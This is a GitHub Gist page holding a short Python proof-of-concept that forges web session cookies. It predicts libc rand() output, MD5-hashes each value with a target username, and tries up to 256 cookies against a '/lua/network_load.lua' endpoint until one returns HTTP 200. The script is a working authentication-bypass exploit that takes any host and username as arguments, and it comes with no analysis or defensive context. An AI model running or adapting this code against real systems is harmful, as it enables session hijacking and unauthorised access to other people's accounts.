Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
import requests
import sys
import hashlib
from ctypes import *
libc = CDLL('libc.so.6')
if __name__ == "__main__":
if len(sys.argv) < 3:
print('[-] Usage: python poc.py <host> <username>')
sys.exit(1)
host, username = sys.argv[1:]
for i in range(256):
print('[*] Trying with rand() iteration %d...' % i)
session = hashlib.md5(('%d' % libc.rand()) + username).hexdigest()
r = requests.get(host + '/lua/network_load.lua', cookies={'user': username, 'session': session})
if r.status_code == 200:
print('[+] Got it! Valid session cookie is %s for username %s.' % (session, username))
break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.